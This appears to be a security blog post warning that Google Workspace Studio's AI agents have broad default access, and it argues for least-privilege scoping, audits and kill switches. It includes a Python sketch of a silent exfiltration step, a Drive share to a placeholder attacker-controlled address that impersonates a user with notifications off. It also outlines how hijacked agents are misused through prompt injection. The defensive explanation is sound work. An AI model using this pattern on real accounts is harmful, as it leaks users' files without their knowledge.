Google Workspace Studio and the least-privilege problem
Google just made it trivially easy for any employee to build AI agents that reach into every corner of your digital workspace. Google Workspace Studio, now generally available, lets users spin up agents in minutes using plain English prompts. These agents run natively across Gmail, Drive, Docs, Sheets, and Calendar, and each user can create up to 100 of them. The pitch is productivity. The problem is that convenience-first design and security-first design are rarely the same thing.
What Google actually shipped
Workspace Studio is powered by Gemini and gives every employee the ability to build, manage, and share AI agents without writing a line of code. Agents can automate workflows across Google's entire productivity suite, connect to third-party tools like Salesforce, Jira, and Asana via pre-built connectors, and extend further through Apps Script and Vertex AI. Sharing an agent is as simple as sharing a Drive file. That last detail matters: it means agent proliferation is not gated by IT, but by nothing more than a Google account and a Workspace license.
The least-privilege problem
There is a well-established security principle called least privilege: every user, service, or system should have access only to the resources strictly necessary for its job. It is one of the oldest ideas in information security, and it exists because broad access means a broad blast radius when something goes wrong. Google's approach inverts this. Workspace Studio agents operate across your entire suite by default. An agent built to summarize meeting notes can, in principle, also read your email, browse your Drive, and scan your calendar. The access model is permissive unless an admin has explicitly locked it down, and most admins are not yet thinking about agent-level permissions at all.

This is not a theoretical concern. Varonis has noted that AI tools operating on granted permissions can unintentionally expose sensitive data when users or services have excessive access. Okta has warned that "agent sprawl," the rapid deployment of autonomous agents with unmanaged privileged identities, is already one of the primary challenges enterprises face.
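To make that inversion concrete, here is a minimal Python sketch of what least privilege looks like at the OAuth layer, using the google-api-python-client library. The scope URLs are real Google OAuth scopes; the agent, its service-account key file, and the rest of the setup are illustrative assumptions, since Workspace Studio does not expose its permission model this directly.

```python
# A minimal sketch, not Workspace Studio's actual permission model:
# what scoping an agent's Drive access looks like at the OAuth layer.
# "agent-sa.json" is a hypothetical service-account key file.
from google.oauth2 import service_account
from googleapiclient.discovery import build

# Broad scope: read/write access to every file the identity can see.
# This is the shape of a convenience-first default.
BROAD_SCOPES = ["https://www.googleapis.com/auth/drive"]

# Narrow scope: only files this app creates or is explicitly handed.
NARROW_SCOPES = ["https://www.googleapis.com/auth/drive.file"]

creds = service_account.Credentials.from_service_account_file(
    "agent-sa.json",
    scopes=NARROW_SCOPES,  # least privilege: request the narrow scope
)
drive = build("drive", "v3", credentials=creds)

# Under drive.file this listing returns only the agent's own files;
# under the broad drive scope it would enumerate everything.
files = drive.files().list(pageSize=10, fields="files(id, name)").execute()
for f in files.get("files", []):
    print(f["id"], f["name"])
```

The gap between those two scope strings is the gap between an agent that can touch its own working files and an agent that can enumerate everything its owner can see.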
What a compromised agent can actually do
The risks stop being abstract when you walk through the attack surface. An AI agent with broad Workspace access that gets hijacked, whether through prompt injection, credential theft, or a poisoned third-party connector, can do things like:
- Exfiltrate data silently. Copy entire datasets from Drive, share sensitive files to external accounts, or leak tokens and credentials through API calls. As Trend Micro has documented, indirect prompt injection can trick agents into sending memory-stored data to attacker-controlled endpoints, all without the user noticing. The sketch after this list shows how little code the sharing step takes.
- Edit documents undetected. Modify shared Docs, alter Sheets data, or insert subtle misinformation into collaborative files. Because the agent acts with the user's identity, these changes look legitimate in version history.
- Conduct social engineering at scale. Read calendar invites to understand organizational relationships, then draft and send emails that mimic internal communication patterns. A compromised agent with Gmail and Calendar access is a social engineering machine.
- Escalate its own privileges. Chain tool calls to acquire permissions beyond its intended scope, a pattern OWASP's Top 10 for agentic AI security specifically flags as a critical attack vector.
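To see why the exfiltration item is so cheap for an attacker, here is a deliberately minimal sketch, not a working exploit, of what a single Drive API call can do once an agent holds the broad drive scope and acts as its user via domain-wide delegation. Every identifier below (the key file, user address, file ID, and external address) is a hypothetical placeholder.

```python
# A minimal sketch of the exfiltration step: one Drive API call,
# issued under the user's own identity, shares a file externally.
# All identifiers below are hypothetical placeholders.
from google.oauth2 import service_account
from googleapiclient.discovery import build

creds = service_account.Credentials.from_service_account_file(
    "agent-sa.json",
    scopes=["https://www.googleapis.com/auth/drive"],  # broad scope
).with_subject("victim@example.com")  # act as the user via delegation

drive = build("drive", "v3", credentials=creds)

# In the audit trail this share appears to come from the user.
drive.permissions().create(
    fileId="FILE_ID",  # hypothetical sensitive document
    body={
        "type": "user",
        "role": "reader",
        "emailAddress": "outsider@example.com",  # attacker-controlled
    },
    sendNotificationEmail=False,  # no notification, nothing to notice
).execute()
```

Under the narrower drive.file scope from the earlier sketch, the same call fails for any file the agent did not create, which is exactly the containment least privilege buys.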
The numbers back up the urgency. Obsidian Security reported roughly 16,200 AI-related security incidents in 2025, a 49% increase year over year, with an average breach cost of $4.8 million according to IBM.
A different model: scoped permissions by design
Not every platform takes the default-open approach. Notion, for example, scopes agent permissions explicitly. An agent gets access to specific pages or databases, granted one at a time. If you build an agent to manage a project tracker, it can see that tracker and nothing else. It cannot wander into your private notes, read your meeting transcripts, or poke around in unrelated databases. This is the "one agent, one job" philosophy. Each agent has a narrow, well-defined purpose and only the permissions required to fulfill it. The attack surface shrinks to match the job description. A compromised project-tracking agent cannot exfiltrate your HR documents because it never had access to them in the first place.

The contrast is instructive. Google's model optimizes for speed of creation and breadth of capability. A scoped model optimizes for containment and predictability. Both involve tradeoffs, but when the downside of getting it wrong is automated data exfiltration at machine speed, containment should win.
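Here is roughly what that scoped model looks like from code, using Notion's official Python SDK (notion-client). The token and both database IDs are placeholders; the behavior sketched for the unshared database reflects how Notion's API treats resources an integration was never granted.

```python
# A minimal sketch of the "one agent, one job" scoped model, using
# Notion's Python SDK. Both database IDs are hypothetical.
import os
from notion_client import Client
from notion_client.errors import APIResponseError

notion = Client(auth=os.environ["NOTION_TOKEN"])

# The integration only reaches databases a human explicitly shared
# with it, so the project tracker works...
tracker_rows = notion.databases.query(database_id="PROJECT_TRACKER_DB_ID")
print(len(tracker_rows["results"]), "tracker rows")

# ...while an unshared database effectively does not exist from the
# token's point of view: the API refuses rather than returns data.
try:
    notion.databases.query(database_id="HR_DOCS_DB_ID")
except APIResponseError as err:
    print("blocked by scope:", err.code)
```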
The minimum security bar
McKinsey's playbook on agentic AI deployment recommends a layered approach: update governance frameworks first, establish oversight mechanisms, then implement technical controls. That is good advice for a planning document. But if your organization just woke up to find Workspace Studio already enabled, you need a more immediate checklist. Here is the minimum bar:
- Audit agent inventory. Find out how many agents exist in your org, who created them, and what they access. Google's Admin console provides some visibility, but you may need supplementary tooling for full coverage; the sketch after this list shows one way to start at the OAuth-token layer.
- Enforce least privilege. Restrict agent scopes to the minimum required for each workflow. Start with read-only access and expand only when justified. Google's own documentation recommends this approach, even if the default configuration does not enforce it.
- Require human checkpoints. No agent should be able to send external emails, share files outside the organization, or modify access permissions without a human in the loop. These are high-consequence actions that need a gate.
- Set hard spending and rate limits. Cap API call volumes and data transfer rates per agent. Anomalous spikes are often the first indicator of compromise.
- Implement kill switches. Every agent should have an immediate revocation mechanism. If something goes wrong, you need to be able to shut it down in seconds, not hours.
- Monitor like you would a human identity. AI agents should be subject to the same identity threat detection and response (ITDR) strategies you apply to human accounts. Log every action, flag anomalies, and review regularly.
- Lock down third-party connectors. Pre-built integrations with Salesforce, Jira, and other tools expand the blast radius beyond Google's ecosystem. Vet each connector and restrict which agents can use them.
- Educate your workforce. If every employee can create agents, every employee needs to understand the security implications of doing so. This is not an IT-only problem.
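For the audit and kill-switch items, here is a starting-point sketch against Google's Admin SDK, which exists today even though Workspace Studio does not yet expose a dedicated agent-management API that I am aware of. It assumes a service account with domain-wide delegation into an admin identity; the key file, addresses, and client ID are placeholders.

```python
# A minimal sketch of two checklist items at the OAuth-token layer:
# audit which apps/agents users have authorized, then revoke one.
# All identifiers below are hypothetical placeholders.
from google.oauth2 import service_account
from googleapiclient.discovery import build

SCOPES = [
    "https://www.googleapis.com/auth/admin.reports.audit.readonly",
    "https://www.googleapis.com/auth/admin.directory.user.security",
]
creds = service_account.Credentials.from_service_account_file(
    "admin-sa.json", scopes=SCOPES
).with_subject("admin@example.com")  # delegate into an admin identity

reports = build("admin", "reports_v1", credentials=creds)
directory = build("admin", "directory_v1", credentials=creds)

# Audit: recent OAuth token events across the org show which apps and
# agents have been granted access, and by whom.
events = reports.activities().list(
    userKey="all", applicationName="token", maxResults=50
).execute()
for activity in events.get("items", []):
    actor = activity["actor"].get("email", "unknown")
    for event in activity.get("events", []):
        print(actor, event.get("name"))

# Kill switch: revoke one app's grant for one user. This cuts off
# every capability that client ID had for that account at once.
directory.tokens().delete(
    userKey="user@example.com", clientId="CLIENT_ID"
).execute()
```

Revoking the OAuth grant is the bluntest kill switch available, but blunt is what you want when an agent is misbehaving and the clock is running.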
The real AI risk
The dominant narrative around AI risk still orbits around sentience, job displacement, and existential scenarios. These make for compelling headlines but poor threat models. The actual, present-day risk is far more mundane and far more urgent: autonomous software with broad access to sensitive systems, running at machine speed, with insufficient guardrails. Google Workspace Studio is a genuinely useful product. The ability to automate repetitive work with natural language is a real productivity gain. But useful and safe are different properties, and right now the gap between them is wider than it should be. If your organization has Workspace Studio enabled, the question is not whether to use it. It is whether your security posture is ready for what it makes possible.
References
- Google Workspace Blog, "Introducing Google Workspace Studio to automate everyday work with AI agents" (2026). https://workspace.google.com/blog/product-announcements/introducing-google-workspace-studio-agents-for-everyday-work
- UC Today, "Is Google Workspace Studio's Rollout Already Ahead of Your Governance Policy?" (2026). https://www.uctoday.com/productivity-automation/is-google-workspace-studios-rollout-already-ahead-of-your-governance-policy/
- Varonis, "Why Least Privilege Is Critical for AI Security" (2025). https://www.varonis.com/blog/why-polp-is-critical-for-ai-security
- Okta, "Why AI Agents Must Be Treated as Privileged Users" (2025). https://www.okta.com/newsroom/articles/why-ai-agents-must-be-treated-as-privileged-users/
- Trend Micro, "Unveiling AI Agent Vulnerabilities Part III: Data Exfiltration" (2025). https://www.trendmicro.com/vinfo/us/security/news/threat-landscape/unveiling-ai-agent-vulnerabilities-part-iii-data-exfiltration
- OWASP, "Top 10 Risks and Mitigations for Agentic AI Security" (2025). https://genai.owasp.org/2025/12/09/owasp-genai-security-project-releases-top-10-risks-and-mitigations-for-agentic-ai-security/
- Obsidian Security and DataBahn, "AI Agents Security Incidents and Related CVEs for Enterprise Security Teams" (2026). https://www.databahn.ai/blog/ai-agents-security-incidents-and-related-cves-for-enterprise-security-teams
- IBM, "AI Agent Security Best Practices Guide" (2025). https://www.ibm.com/think/tutorials/ai-agent-security
- McKinsey, "Deploying Agentic AI with Safety and Security: A Playbook for Technology Leaders" (2025). https://www.mckinsey.com/capabilities/risk-and-resilience/our-insights/deploying-agentic-ai-with-safety-and-security-a-playbook-for-technology-leaders
- Palo Alto Networks Unit 42, "AI Agents Are Here. So Are the Threats." (2025). https://unit42.paloaltonetworks.com/agentic-ai-threats/
- Google Cloud, "AI Agent Security: How to Protect Digital Sidekicks (and Your Business)" (2025). https://cloud.google.com/transform/ai-agent-security-how-to-protect-digital-sidekicks-and-your-business/